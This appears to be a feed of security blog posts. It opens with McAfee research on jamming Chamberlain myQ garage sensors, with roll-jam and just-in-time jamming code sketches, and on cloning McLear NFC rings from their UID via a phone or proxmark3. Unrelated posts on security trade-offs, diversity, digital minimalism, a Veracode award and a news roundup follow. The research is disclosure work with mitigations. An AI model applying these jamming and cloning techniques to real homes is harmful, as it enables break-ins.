The UART connection was disconnected or not enabled, but the JTAG connection worked to communicate directly with the main Wi-Fi module. With the JTAG connection we were able to dump the entire contents of the flash chip and debug the system unrestricted. The main Wi-Fi module was a Marvell microcontroller running an RTOS (Real Time Operating System), which behaves much differently than a normal Linux system. While it will still run predefined applications, an RTOS usually doesn’t have a filesystem like traditional systems do. We extracted the entire contents of the Marvell microprocessor and were able to analyze the assembly and determine how the web server behaves.

From looking through the web server code we were able to identify how the device is setup through the local API as well as finding some interesting, albeit not very useful commands that we could send.

Local API commands

There were more URLs that we found to be accessible and some additional API paths, but nothing stood out as a good place to start an attack from. At this point we decided to investigate the other attack vectors.

We didn’t spend too much time looking into the third-party attack vector and remote API since it becomes a gray area for research. While we were testing with the /sys/mode API call we were able to put the device into a soft factory reset, which allowed us to attempt to add the device to a different account. From capturing the SSL traffic on the mobile application, we were able to see that it was failing since the serial number was already registered to another account. We used a technique called SSL unpinning to decrypt traffic from the Android application; we’ll post a future blog explaining this process in greater detail. One thing that we wanted to try was to modify the Android app to send a different serial number. Since we don’t believe that the device ever cleared the original garage door information, we could have potentially opened the device from the new account. However, this is all speculation and was not tested because we didn’t want to access the remote API.

The last vector we looked at was RF. We began trying to break down the frequency modulation between the remote door sensor and the Hub. We originally thought it was some sort of FSK (frequency shift keying), where data is transmitted digitally: if the signal is on one frequency the corresponding bit is a 0, and if the signal is on another frequency the bit is a 1. This idea was thrown out since the MyQ remote sensor was using three different frequencies, not just two.

Looking at the door sensor’s FCC filing we noticed a particularly helpful revision that they made.

OOK stands for “On-Off Keying” and is another method of encoding digital bits into RF. With OOK, the transmitter is either sending a signal (1) or not sending a signal (0), which means the transmitter and receiver must be synchronized.
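
As a rough illustration of how OOK can be recovered from a capture, the sketch below slices an amplitude envelope into symbol-length windows and thresholds each one; the envelope, threshold, and symbol length are illustrative assumptions, not values taken from the MyQ capture.

    # Rough OOK demodulation sketch. `envelope` holds the magnitude of SDR
    # samples for one burst; threshold and samples-per-symbol are illustrative.
    import numpy as np

    def decode_ook(envelope, samples_per_symbol, threshold=None):
        if threshold is None:
            # Midpoint between the quiet floor and the peak amplitude.
            threshold = (envelope.min() + envelope.max()) / 2.0
        # Slice the capture into symbol-length windows; signal present -> 1, absent -> 0.
        n_symbols = len(envelope) // samples_per_symbol
        bits = []
        for i in range(n_symbols):
            window = envelope[i * samples_per_symbol:(i + 1) * samples_per_symbol]
            bits.append(1 if window.mean() > threshold else 0)
        return bits

    # Quick self-check with synthetic data: the pattern 1 0 1 1 at 100 samples per symbol.
    rng = np.random.default_rng(0)
    clean = np.repeat([1.0, 0.0, 1.0, 1.0], 100)
    noisy = clean + 0.05 * rng.standard_normal(clean.size)
    print(decode_ook(noisy, samples_per_symbol=100))    # -> [1, 0, 1, 1]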

On Off Keying Graphical Representation

Here is the binary representation for the signal captured from the MyQ remote door sensor. This is a tightly zoomed-in window of the entire signal.

One full message captured, each color is a different frequency

aaaaaaaa559999aa59655659a6965aa9a99996aa6aa0aaaaaaaa55a9699a6566696699555a6a5556966555500aaaaaaaa559999aa59655659a6965aa9a99996aa6aa

We can observe the state transmission captured from all three frequencies and converted to hexadecimal. It’s easy to identify data patterns within the transmission, as represented in color above, but we were never able to crack it to arbitrarily transmit false states from our SDR (Software Defined Radio). We also noticed that the RF engineers at Chamberlain had security in mind not only by separating the signal into three separate frequencies, but also by implementing rolling codes. You may be familiar with the rolling code technique from things like your standard garage door opener or your car key fob. Rolling code devices prevent an attacker from directly capturing a signal and replaying it: each transmission contains a unique identifier that is noted by the receiver, and if the receiver ever sees a signal with that unique ID again, it will ignore it.

The way attackers have overcome rolling code devices is by a method called “Roll Jam.” An attacker will jam the rolling code signal from the transmitter, blocking it from ever making it to the receiver, while simultaneously capturing the valid rolling code and storing it. This way the attacker now has an unused and valid rolling code that the receiver has never seen before. The caveat to this method is that normally the victim will notice that either the garage door or car didn’t unlock. A stealthier variant of Roll Jam is to always capture the latest code and replay the previously captured signal (the latest minus one). This way the car or door still opens, but the attacker retains the newest code for their own use.
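
The control flow of that stealthier variant can be sketched roughly as follows; the jam_band(), capture_code(), and transmit() helpers are hypothetical placeholders for SDR operations, not a working implementation against any product.

    # Conceptual "roll jam minus one" flow. jam_band(), capture_code(), and
    # transmit() are hypothetical placeholders for SDR operations.
    def roll_jam_loop(jam_band, capture_code, transmit):
        reserve = None                      # the unused rolling code we hold on to
        while True:
            jam_band(enable=True)           # block the receiver from hearing the new code
            latest = capture_code()         # ...while recording it ourselves
            jam_band(enable=False)
            if reserve is not None:
                transmit(reserve)           # replay the previous code so the door still opens
            reserve = latest                # keep the newest, never-seen code for later use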

The MyQ also had a rolling code implementation that we were able to develop a variant of this technique against. We took the concept of jamming the original code from the receiver by transmitting a large amount of “noise” directly adjacent to the valid signal frequency. This causes the receiver in the MyQ Hub to overload and not hear the valid signal. However, with the precision of the SDR, we were able to ignore the noise that we are transmitting and store the signal. This was further complicated by the fact that there were three frequencies that we had to simultaneously listen for and jam. If you are interested in this FHSS (Frequency Hopping Spread Spectrum) Roll Jam technique, please read our white paper.

This technique worked, but since the remote sensor and the MyQ Hub always have the advantage in the RF landscape, it was unreliable. The jamming aspect of the attack worked nicely; however, since we are outside of the garage and the remote sensor and the Hub are both located within the same garage, it is harder to jam and listen at the same time with the garage door and walls acting as barriers. With higher-powered radios, frequency-tuned antennas, and disregard for FCC regulations, the jamming of the remote sensor could take place at a much greater distance than we were able to test in our lab environment.

A waterfall view of the remote sensor signal (red) and jamming (black)

With our jamming working reliably, we confirmed that when a user closes the garage door via the MyQ application, the remote sensor never responds with the closed signal because we are jamming it. The app will alert the user that “Something went wrong. Please try again.” This is where a normal user, if not in direct sight of the garage door, would think that their garage door is indeed open, when in reality it is securely closed. If the user believes the MyQ app then they would do as the application indicates and “try again” – this is where the statelessness of garage doors comes into play. The MyQ Hub will send the open/closed signal to the garage door and it will open, because it is already closed, and it is simply changing state. This allows an attacker direct entry into the garage, and, in many cases, into the home.

Since the garage door is now really open, the attacker probably doesn’t want to leave the state as is, which would notify the victim that something went wrong again. Putting the garage door into a closed state and allowing the app to clear the error will put the victim at ease. This could be executed either by replaying a previously captured closed signal or, most simply, by removing the remote sensor from the Velcro on the garage door and placing it in the vertical position, signaling to the Hub that the door closed successfully.
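
Because the door itself is stateless from the Hub’s point of view, the “try again” behavior can be modeled with a toy toggle like the one below; the class name and the signal_jammed flag are purely illustrative.

    # Toy model of the stateless toggle; names and the signal_jammed flag are illustrative.
    class GarageDoor:
        def __init__(self):
            self.open = True                # door starts open (e.g. after a delivery)

        def toggle(self):                   # the Hub only ever sends a toggle
            self.open = not self.open

    door = GarageDoor()

    # User taps "close" in the app: the door really closes, but the jammed sensor
    # never reports it, so the app shows "Something went wrong. Please try again."
    door.toggle()                           # door is now physically closed
    signal_jammed = True
    if signal_jammed:
        print("App: Something went wrong. Please try again.")

    # The user taps "try again": the Hub sends another toggle and the door re-opens.
    door.toggle()
    print("Door physically open?", door.open)   # -> True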

Attack Reproduction State Flowchart

We also realized that in a real-world scenario an attacker wouldn’t likely sit outside of a garage all day, so we decided to automate the attack. We used GNU Radio to implement a JIT (just in time) method of jamming in which the SDR sits dormant, listening on the MyQ’s three separate frequencies. The moment it notices that the remote door sensor is beginning a transmission, it dynamically enables the jammer and starts jamming the signal.

GNU Radio JIT Jamming and State Capture over 3 Simultaneous Frequencies

This expands the use cases of this type of attack by being able to create a small device that could be placed out of sight near the garage door. This technique is also described in more detail in our FHSS white paper. The JIT jamming makes it very difficult to locate the device using RF triangulation and allows it to be better equipped for battery operation.
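
Conceptually, the just-in-time trigger boils down to a per-channel energy detector; the following sketch assumes hypothetical read_block(), start_jamming(), and stop_jamming() callbacks standing in for the SDR plumbing, and its threshold is illustrative rather than a tuned value from the actual GNU Radio flowgraph.

    # Simplified just-in-time jamming trigger. read_block() and the jammer
    # callbacks are hypothetical stand-ins for SDR plumbing; the threshold is
    # illustrative, not a tuned value from the MyQ research.
    import numpy as np

    THRESHOLD = 5.0          # energy ratio over the noise floor that counts as a burst
    CHANNELS = (0, 1, 2)     # the three sensor frequencies, tuned elsewhere

    def jit_jammer(read_block, start_jamming, stop_jamming, noise_floor):
        jamming = False
        while True:
            # Mean power of the latest block of complex samples from each channel.
            energies = [np.mean(np.abs(read_block(ch)) ** 2) for ch in CHANNELS]
            burst = any(e > THRESHOLD * noise_floor[ch]
                        for ch, e in zip(CHANNELS, energies))
            if burst and not jamming:
                start_jamming()             # sensor started transmitting: jam immediately
                jamming = True
            elif not burst and jamming:
                stop_jamming()              # burst ended: go quiet again to stay hidden
                jamming = False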

While this may not be too common for individuals using the MyQ Hub, recall the earlier reference to third-party partnerships with MyQ for garage delivery. Another possible attack would be when a delivery driver uses the application. The primary reason users sign up for this service is the concept of a package delivery to a secure location (the garage) even when they are not home. The victim can be absent from the property yet have access via the MyQ app over the internet to open or close the garage door if a delivery driver uses the MyQ Hub for an in-garage delivery. A determined hacker could pull this attack off, and the victim may have a higher probability of believing that the door may in fact be open. We disclosed our findings in full to Chamberlain on 9/25/2019, including detailed reproduction steps for the jamming attack. We also talked to Chamberlain about this issue with third-party delivery drivers and how it could fit into this attack model. After extensive testing and validation of the issue, the vendor released an update to the myQ App as of version 4.145.1.36946. This update provides a valuable warning message to users indicating that the garage door state may not be accurate, but it does not prevent the user from remotely controlling the door itself.

The beauty of IoT devices is that they solve problems that we have learned to deal with. After we experience the convenience and the way these devices can automate, secure, or assist in our lives, it is hard to see them ever going away. This ease and automation often overshadows the potential security threat that they may pose. Even simple enhancements to manual products over time have this effect; take for example the now-legacy garage door opener in your car. The ability to capture and replay its basic signals transformed the threat from physical to digital space. While the Chamberlain MyQ Hub ultimately produces a generally more secure method of accessing garages than its predecessors, consumers should be aware that any extension of a technology platform, such as using Wi-Fi, a mobile app and FHSS RF transmissions, also extends possible threat vectors.

We would like to finish by commenting that the likelihood of a real-world attack on this target is low, based on the complexity of the attack and installation footprint. We have discussed this with Chamberlain, who has validated the findings and agrees with this assessment. Chamberlain has made clear efforts to build a secure product and appears to have eliminated much of the low-hanging fruit common to IoT devices. This vendor has been a pleasure to work with and clearly prioritizes security as a foresight in the development of its product.

NOTE: Within the research related to Chamberlain Garage Door Hub described in this blog, the only interference was to unlicensed spectrum radio frequency for the minimum period while the garage door hub was transmitting state signal, and there was no interference with any communications signal licensed or authorized under the Communications Act or FCC rules.

 

 

The post We Be Jammin’ – Bypassing Chamberlain myQ Garage Doors appeared first on McAfee Blogs.

The Cloning of The Ring – Who Can Unlock Your Door?

Steve Povolny contributed to this report.

McAfee’s Advanced Threat Research team performs security analysis of products and technologies across nearly every industry vertical. Special interest in the consumer space and Internet of Things (IoT) led to the discovery of an insecure design with the McLear NFC Ring, a household access control device. The NFC Ring can be used to interact with NFC-enabled door locks which conform to the ISO/IEC 14443A NFC card type. Once the NFC Ring has been paired with an NFC-enabled door lock, the user can access their house by simply placing the NFC Ring within NFC range of the door lock.

McLear originally invented the NFC Ring to replace traditional keys with functional jewelry. The NFC Ring uses near field communication (NFC) for access control, to unlock and control mobile devices, share and transfer information, link people and much more. McLear NFC Ring aims to redefine and modernize access control to bring physical household security through convenience. Their latest ring also supports payment capability with McLear Smart Payment Rings, which were not in scope for this research.

Identity is something which uniquely identifies a person or object; an NFC tag is a perfect example of this. Authentication can generally be classified into three types: something you know, something you have, and something you are. An NFC Ring is different from general NFC access tag devices (something you have) because the Ring sits on your finger, so it is a hybrid authentication type of something you have and something you are. This unique combination, as well as the accessibility of a wearable Ring with NFC capabilities, sparked our interest in researching this product as an NFC-enabled access control device. Therefore, the focus of our research was on the NFC Ring’s protection against cloning as opposed to the door lock, since NFC access control tags and door locks have been well-researched.

The research and findings for this flaw were reported to McLear on September 25, 2019. To date, McAfee Advanced Threat Research has not received a response from the vendor.

Duplicating Keys Beyond the Hardware Store

In the era of the Internet of Things (IoT), the balance between security and convenience is an important factor to get right during the concept phase of a new product and the bill of materials (BOM) selection. The hardware selection is critical as it often determines the security objectives and requirements that can be fulfilled during design and implementation of the product lifecycle. The NFC Ring uses an NFC-capable Integrated Circuit (IC) which can be easily cloned and provides no security other than NFC proximity. The NFC protocol does not provide authentication and relies on its operational proximity as a form of protection. The problem with NFC tags is that they automatically transmit their UID when in range of an NFC device reader, without any authentication.

Most consumers today use physical keys to secure access to their household door. The physical key security model requires an attacker to get physical access to the key or break the door or door lock. The NFC Ring, if designed securely, would provide equal or greater security than the physical key security model. However, since the NFC Ring can be easily cloned without having to attain physical access to the Ring, it makes the product’s security model less secure than a consumer having a physical key.

In this blog we discuss cloning of the NFC Ring and secure design recommendations to improve its security to a level equal to or greater than existing physical keys.

NFC Ring Security Model and Identity Theft

All McLear non-payment NFC Rings using NTAG216 ICs are impacted by this design flaw. Testing was performed specifically on the OPN, which has an NTAG216 IC. The NFC Ring uses the NTAG216 NFC-enabled Integrated Circuit (IC) to provide secure access control by means of NFC communication.

The NFC protocol provides no security as it’s just a transmission mechanism.  The onus is on product owners to responsibly design and implement a security layer to meet the security objectives, capable of thwarting threats identified during the threat modeling phase at concept commit.

The main threats against an NFC access control tag are physical theft and tag cloning by NFC. At a minimum, a tag should be protected against cloning over NFC; that alone would ensure the NFC Ring provides the same level of security as a physical key. Ideal security would also protect against cloning even when the NFC Ring has been physically stolen, which would provide greater security than that of a physical key.

The NTAG216 IC provides the following security features per the NFC Ring spec:

  1. Manufacturer programmed 7-byte UID for each device
  2. Pre-programmed capability container with one-time programmable bits
  3. Field programmable read-only locking function
  4. ECC based originality signature
  5. 32-bit password protection to prevent unauthorized memory operations

The NFC Ring security model is built on the “Manufacturer programmed 7-byte UID for each device” as the identity and authentication factor presented to the access control device or door lock. This 7-byte UID (unique identifier) can be read by any NFC-enabled device reader, such as a proxmark3 or mobile phone, when within NFC communication range.

The NFC Ring security model can be broken by any NFC device reader that comes within NFC communication range, since the static 7-byte UID is automatically transmitted without any authentication. Once the 7-byte UID has been successfully read, a magic NTAG card can be programmed with the UID, which forms a clone of the NFC Ring and allows an attacker to bypass the secure access control without ever attaining physical access to the NFC Ring.
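
To illustrate how freely that identifier is given up, the following minimal sketch reads a tag’s UID using the open source nfcpy library and a USB NFC reader (both assumptions about tooling; a phone app achieves the same result).

    # Minimal UID read using the nfcpy library and a USB NFC reader (assumed tooling).
    import nfc

    clf = nfc.ContactlessFrontend('usb')
    try:
        # Returning False from on-connect hands the tag object back immediately
        # instead of blocking until the tag is removed from the field.
        tag = clf.connect(rdwr={'on-connect': lambda tag: False})
        print("Tag:", tag)
        print("UID:", tag.identifier.hex())     # the static 7-byte identifier
    finally:
        clf.close()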

The NFC Ring is insecure by design as it relies on the static 7-byte UID programmed at manufacture within the NTAG216 for device identity and authentication purposes. The NFC Ring security model relies on NFC proximity and a static identifier which can be cloned.

In addition, we discovered that the UIDs across NFC Rings may be predictable (this was a very small sample size of three NFC Rings):

  • NFC Ring#1 UID 04d0e722993c80
  • NFC Ring#2 UID 04d24722993c80
  • NFC Ring#3 UID 04991c4a113c80

There is a difference of only 22 (0x24 - 0x0e) between the UIDs of NFC Ring#1 and NFC Ring#2. By using social engineering to learn when a victim purchased their NFC Ring, an attacker could purchase a significant sample of NFC Rings around the same time and possibly brute force the victim’s NFC Ring UID.

Social Engineering

Social Engineering consists of a range of techniques which can be used through human interaction for many malicious purposes such as identity theft. In the case of the NFC Ring the goal is to steal the user’s identity and gain access to their home. Reconnaissance can be performed online to gain background information such as what type of technology is being used by the victim for their home access.

One of the most common exchanges of technology today has become the passing of a phone between two untrusted parties to take a picture. The NFC Ring social engineering attack could be as simple as requesting the victim to take a picture with the attacker-supplied phone. The victim-as-helpful-photographer holds the attacker’s phone, which can read NFC tags and could be equipped with a custom Android app to read the NFC Ring UID, all transparent to the victim while they are snapping away. There is no sign to the victim that their NFC Ring is being read by the phone. It is recorded in the system log and cannot be viewed until a USB cable is attached with required software. Once the Ring is compromised, it can be reprogrammed on a standard writable card, which can be used to unlock smart home locks that partner with this product. The victim’s home is breached.

How It’s Done: NFC Ring Cloning

To successfully clone an NFC Tag, one must first identify the Tag type. This can be done by looking up the product specifications in some cases, or verifying by means of an NFC device reader such as a proxmark3.

From the NFC Ring specs we can determine most of the required tag characteristics:

  1. IC Model: NTAG216
  2. Operating Frequency: 13.56Mhz
  3. ISO/IEC: 14443A
  4. User writable space: 888 bytes
  5. Full specifications

In addition, by communicating with a proxmark3 attackers can physically verify the NFC Tag characteristics and obtain the UID which is required for cloning.

The most straightforward method of stealing the unique identifier of the Ring would be through a mobile phone. The following steps were taken in the demo below:

  1. Reading of NFC Ring with proxmark3 and cloning NTAG21x emulator card
  2. Setting attacker’s phone to silent to prevent NFC Tag detection sound
  3. Running our customized Android app to prevent the Android activity popup when an NFC Tag is detected and read.

Mitigation: Secure Design Recommendations

Lock the door. The existing insecure design can be mitigated by using NFC door lock password protection in combination with the NFC Ring for two-factor authentication.

Authenticate. NFC Ring designers must mandate a secure PKI design with an NFC tag that contains a crypto module providing tag authentication. The NFC Ring’s secure design must also mandate, to access control device manufacturers, a security layer on top of NFC to ensure secure and trustworthy operation (a conceptual sketch of such tag authentication follows these recommendations).

Randomize UIDs. In addition, the NFC designers must ensure they are not manufacturing NFC Rings with sequential UIDs, which may be predictable from the purchase date.
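
As a conceptual illustration of the tag authentication recommended above, the sketch below shows a generic HMAC-based challenge-response exchange; the key handling, names, and message sizes are illustrative assumptions, not McLear’s design or any specific NFC standard.

    # Generic challenge-response sketch: the shared key never leaves the tag, so a
    # reader that only observes UIDs (or even whole exchanges) cannot forge a clone.
    # Key handling and names are illustrative assumptions.
    import hashlib
    import hmac
    import os

    class AuthenticatingTag:
        def __init__(self, key: bytes):
            self._key = key                          # provisioned at manufacture, never transmitted

        def respond(self, challenge: bytes) -> bytes:
            return hmac.new(self._key, challenge, hashlib.sha256).digest()

    class DoorLock:
        def __init__(self, key: bytes):
            self._key = key

        def admit(self, tag) -> bool:
            challenge = os.urandom(16)               # fresh nonce per attempt, so replays fail
            expected = hmac.new(self._key, challenge, hashlib.sha256).digest()
            return hmac.compare_digest(tag.respond(challenge), expected)

    shared_key = os.urandom(32)
    lock = DoorLock(shared_key)
    print(lock.admit(AuthenticatingTag(shared_key)))          # True: genuine ring
    print(lock.admit(AuthenticatingTag(b"uid-only-clone")))   # False: a clone lacks the key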

Consumer Awareness

To make customers aware of the security risks associated with products available on the market, product manufacturers should clearly state the level of security which their product provides in comparison with the technology or component they claim to be advancing. Are customers holding the master key to unlock their door, and are there duplicates?

In the case of the NFC Ring, while convenient, it clearly does not provide the same level of security to consumers as a physical key. This decrease in the security model from a physical key to an NFC Ring is not due to technology limitations but due to an insecure design.

 

The post The Cloning of The Ring – Who Can Unlock Your Door? appeared first on McAfee Blogs.

The Tradeoff Between Convenience and Security – A Balancing Act for Consumers and Manufacturers

This week McAfee Advanced Threat Research (ATR) published new findings, uncovering security flaws in two popular IoT devices: a connected garage door opener and a “smart” ring, which, amongst many uses, utilizes near field communication (NFC) to open door locks.

I’d like to use these cases as examples of a growing concern in the area of product security. The industry of consumer devices has seen some positive momentum for security in recent years. For example, just a few years back, nearly every consumer-grade router shipped with a default username and password, which, if left unchanged, represented a serious security concern for home networks. Most routers now at least ship with a unique password printed on the physical device itself, dramatically increasing overall network security. Despite positive changes such as this, there is a long way to go.

If we think about the history of garage doors, they began as a completely manual object, requiring the owner to lift or operate it physically. The first overhead garage door was invented in the early 1920s, and an electric version came to market just a few years later. While this improved the functionality of the device and allowed for “remote” entry, it wasn’t until many years later that an actual wireless remote was added, giving consumers the ability to allow wireless access into their home. This was the beginning of an interesting tradeoff for consumers – an obvious increase in convenience which introduced a potential new security concern.

The same concept applies to the front door. Most consumers still utilize physical keys to secure the front door to their homes. However, the introduction of NFC enabled home door locks, which can be opened using compatible smart rings, adds both convenience and potentially compromised security.

For example, upon investigating the McLear NFC Ring, McAfee ATR uncovered a design insecurity, which could allow an attacker to easily clone the NFC Ring and gain entry to a home utilizing an NFC enabled smart lock.

While the NFC Ring modernizes physical household security, the convenience that comes with technology implementation also introduces a security issue.

The issue here is at a higher level; where and when do we draw the line for convenience versus security? The numerous benefits technology enhancements bring are exciting and often highly valuable; but many are unaware of the lengths cyber criminals will go to (for example, we once uncovered a vulnerability in a coffee pot which we were able to leverage to gain access to a home Wi-Fi network) and the many ways new features can reduce the security of a system.

As we move towards automation and remote access to nearly every computerized system on the planet, it’s our shared responsibility to maintain awareness of this fact and demand a higher bar for the products that we buy.

So what can be done? The responsibility is shared between consumers and manufacturers, and there are a few options:

For consumers:

  • Practice proper cyber hygiene. From a technical perspective, consumers have many tools at their disposal, even when security concerns do manifest. Implement a strong password policy, put IoT devices on their own, separate network, utilize dual-factor authentication when possible, minimize redundant systems and patch quickly when issues are found.
  • Do your research. Consumers should ensure they are aware of the security risks associated with products available on the market.

For product manufacturers:

  • Manufacturer supported awareness. Product manufacturers can help by clearly stating the level of security their product provides in comparison with the technology or component they seek to advance.

  • Embrace vulnerability disclosure. Threat actors are constantly tracking flaws which they can weaponize; conversely, threat researchers are constantly working to uncover and secure product vulnerabilities. By partnering with researchers and responding quickly, vendors have a unique opportunity to fix flaws before they are widely exploited.

The post The Tradeoff Between Convenience and Security – A Balancing Act for Consumers and Manufacturers appeared first on McAfee Blogs.

Do You Have Blind Spots? McAfee Welcomes Check Your Blind Spots Bus Tour

A bus, virtual reality, and conversations around inclusion.

How do all these fit together? The answer: CEO Action’s Check Your Blind Spots Bus Tour.

Working at McAfee means innovating in everything we do – it’s imperative for us to stay a step ahead of cyberattacks. This includes new approaches to challenge thinking about diversity. That’s where CEO Action and Check Your Blind Spots Bus Tour comes in.

In December, McAfee was honored to be among the one hundred stops around the country on an interactive, eye-opening mobile tour that used virtual reality and gaming technology to help us recognize unconscious biases, or blind spots.

Inside the Tour Bus

When the tour bus rolled up, McAfee team members lined up to uncover unconscious bias in a new way with immersive gaming technology. Some of the interactive elements included:

  • Wake Up Call: A 100% audio experience, through a wall of ringing phones, McAfee team members picked up a receiver to overhear conversations between landlords, tenants, and potential renters that reveal unintended bias.
  • Look Through a Different Lens: Via gamification and digital viewfinder, McAfee team members watched an interaction between co-workers setting up a work-related event and then, identified moments when unconscious biases are demonstrated.
  • Face Yourself, Face Reality: In front of a mirror, McAfee team members watched as their reflection fades away to reveal a different person staring back at them. Through this touchscreen experience, each new reflection shares a series of biases they’ve experienced.

McAfee team members share their experience:

Sign the I Act On Pledge

Ready to take action and drive inclusive behaviors in your day-to-day life? Join the hundreds of McAfee employees who signed the I Act On Pledge to do just that.

I pledge to check my bias, speak up for others and show up for all.

Take the pledge.

 

It’s a new year! Start off strong with a company that’s invested in building an inclusive workplace. Search our openings.

The post Do You Have Blind Spots? McAfee Welcomes Check Your Blind Spots Bus Tour appeared first on McAfee Blogs.

Is It Time to Overhaul Your Relationship with Technology?


Editor’s Note: This is part I of a series on Digital Minimalism in 2020.

When Steve Jobs introduced the iPhone in 2007, he called it the "best iPod ever" and said it would be a "very cool way" to make calls and listen to music. Little did he know that it would be the catalyst for a technology tsunami of social networks, apps, and gaming platforms that would come to own our collective attention span.

But here we are. Every day we enter an algorithmic ecosystem that has little to do with our initial desire to connect with friends and have a little fun. We've gone from fumbling to find our flip phones to checking our phones 96 times a day, or once every 10 minutes, according to recent research.

We’re getting it

However, with more time and knowledge behind us, parents and consumers are starting to get it.

We now know that companies deliberately engineer our favorite digital destinations to get us hooked. With every "like," emoji, comment, and share, companies have figured out how to tap into our core human motivators of sensation and anticipation, which keep our dopamine levels amped the same way tobacco, gambling, or overeating might.

This evolution of marketing and economics has hit us all hard and fast. But as Maya Angelou famously said, when we know better, we can do better. Stepping into 2020 may be the best time to rethink — and totally reconstruct — our relationship with technology.


Digital Detox vs. Digital Minimalism

We’ve talked a lot about digital detox strategies, which, no doubt, have helped us reduce screen time and unplug more. However, there’s a new approach called digital minimalism that may offer a more long-term, sustainable solution to our tech-life balance.

The difference in approaches is this: A detox implies you will stop for a brief period and then resume activities. Digital minimalism is stopping old habits permanently and reconstructing a new way forward.

Digital minimalism encourages us to take a long, hard, honest look at our relationship with technology, be open to overhauling our ideology, and adopt a “less is more” approach.

Author Cal Newport examines the concept in his book, Digital Minimalism: Choosing a Focused Life in a Noisy World, which is built on three principles: a) clutter is costly, b) optimization is important, and c) intentionality is satisfying.

According to Newport, digital minimalism allows us to rebuild our relationship with technology so that it serves us — not the other way around. Here’s the nugget: When you can clearly define and understand your values, you can make better, more confident decisions about what technology you use and when.

Three core principles

• Scrutinize value. Digital clutter is costly. Therefore, it’s critical to examine every piece of technology you allow into your life and weigh it against what it costs you in time, stress, and energy.

Ask yourself: 

What am I genuinely gaining from the time I am spending on this site?
What is being here costing me in terms of money and attention?
What emotions rise (positive, negative) when I’m using this app/site?
Can I perform the same task differently?

• Optimize resources. You don't have to throw out all your technology to be a digital minimalist. Instead, optimization means determining which digital sources bring you the most value. For example, you may habitually scroll six news sources each day when you only gain value from two. You may have six active social networks you frequent out of obligation or habit when only one actually offers you value and genuine connection.

Ask yourself:

What app/site is the most accurate and valuable to me?
What app/site feeds my emotions, goals, and relationships in a positive, healthy way?
What app/site helps me personally to work more efficiently?

• Align tech with values. The third principle of intentionality is inspired by the Amish way of life and encourages holding every technology decision up against your fundamental values. For instance, if spending time on a specific app doesn’t support your priorities of family and personal health, then that fun, albeit misaligned app does not make the cut. 

Ask yourself:

Does this activity benefit and support my values and what I’m trying to do in my life?
Am I better off without this online activity?

Getting started

  • 30 days of less. For 30 days, cut out all non-essential technology from your life. Use only what is essential to your income and health.
  • Reflect on values. Reflect on the things that are truly important to you and your family. Think about what activities bring you joy and which specific people interest you. If you decide that creating art or volunteering are your central values, ask yourself, “Does this technology support my value of creating art and volunteering?”
  • Increase solitude. Researchers have found a connection between lack of solitude and the rise in depression and anxiety among digital natives (iGen), a phenomenon they call isolation deprivation. Solitude allows us to process, reflect, and problem-solve. Little by little, begin to increase your time for personal reflection.

While it's easy to demonize the growing presence and power of technology (smartphones and social media specifically) in family life, technology has also added amazing value and isn't going anywhere soon. So we do what we can: stop and examine the way we use technology each day and how much control we give it over our time, hearts, and minds.

The post Is It Time to Overhaul Your Relationship with Technology? appeared first on McAfee Blogs.

SC Media Inducts Veracode into its 2019 Innovator Hall of Fame


We are excited to announce that Veracode has been inducted into SC Media's 2019 Innovator Hall of Fame. To select the honorees, the SC Media team leverages data from SC Labs testing groups, conferences, research, and referrals. The team then evaluates the nominees against strict criteria to ensure that the final selection is comprised of vendors with the most promising products and capabilities.

We're honored to be one of only five new Hall of Fame inductees!

To announce its innovators, SC Media publishes an annual eBook highlighting the selected vendors' greatest strengths.

"We interviewed each vendor to understand the security problems they identified and mitigated with their latest innovations," the SC Media editors wrote. "Almost every organization pointed to two interrelated struggles: exhausting technological 'noise' and personnel fatigue." This leaves security operations centers understaffed, overwhelmed, and frustrated, they continued.

"The vendors on this list understand these problems and recognize how such issues inhibit business operations and user experiences. They have responded with two helpful solutions: advanced automation and threat prioritization. Many platforms include artificial intelligence and machine learning that recognize patterns and can replicate remediation processes in the future to remove the manual burden from SOCs. Many new solutions also can determine whether a noted threat poses significant or minimal risk and adjust alert policies accordingly. In nearly every case, both automation and threat prioritization are integrated into a platform that can then easily integrate with existing infrastructures, making the transition to these nextgen solutions quick and easy," the editors said.

Veracode was selected as an honoree in the Virtualization and cloud-based security category. The description said, in part:

The Veracode Platform provides an entire system of testing, scans and analysis that minimizes the presence of vulnerabilities and produces more secure software as a result. Veracode knows that vendors want to develop, use and sell software with confidence. By integrating into the development process multiple testing techniques, including static, dynamic and software composition analysis, the Veracode Platform can anticipate many potential vulnerabilities and resolve them before they ever materialize in a software's final form.

Veracode also differentiates itself as a SaaS provider, according to SC Media, saying the model "makes Veracode versatile enough for local and global use, even by organizations with highly distributed personnel or partners."

The recognition went on to say:

Veracode hopes to influence the cybersecurity ecosystem as well as the organizations they serve, so that vulnerability prevention becomes not just one possible solution amidst a series of alternatives but a standard step in software development procedures. All enterprises developing their own applications will likely benefit from the security measures integrated into the Veracode platform.

Veracode is also recognized for its ability to ease the workload of security and development teams by integrating multiple testing techniques into the development process. This strength is making a positive cultural impact on the perception of cybersecurity measures.

To learn more about our induction into the Innovator Hall of Fame, check out SC Media's eBook, Innovators. For additional information on our comprehensive suite of products and services, visit the Veracode homepage.

Cyber Security Roundup for January 2020

A roundup of UK focused cyber and information security news stories, blog posts, reports and threat intelligence from the previous calendar month, December 2019.

Happy New Year!  The final month of the decade was a pretty quiet one as major security news and data breaches go, given cyber attacks have become the norm over the past decade. The biggest UK media security story was saved for the very end of 2019, with the freshly elected UK government apologising after it accidentally published online the addresses of the 1,097 New Year Honours recipients. Among the addresses posted were those of Sir Elton John, cricketer and BBC 'Sports Personality of the Year' Ben Stokes, former Conservative Party leader Iain Duncan Smith, 'Great British Bake Off' winner Nadiya Hussain, and former Ofcom boss Sharon White. The Cabinet Office said it was "looking into how this happened", which will probably come down to 'user error' in my view.

An investigation by The Times found hedge funds had been eavesdropping on the Bank of England's press conferences before their official broadcast, after the Bank's internal systems were compromised. The hedge funds were said to have gained a significant advantage over rivals by purchasing access to an audio feed of Bank of England news conferences. The Bank said the practice was "wholly unacceptable" and that it was investigating further. The Times claimed those paying for the audio feed, via the third party, would receive details of the Bank's news conferences up to eight seconds before those using the television feed, potentially making them money. It is alleged the supplier charged each client a subscription fee and up to £5,000 per use. The system, which had been misused by the supplier since earlier in the year, was installed in case the Bloomberg-managed television feed failed.

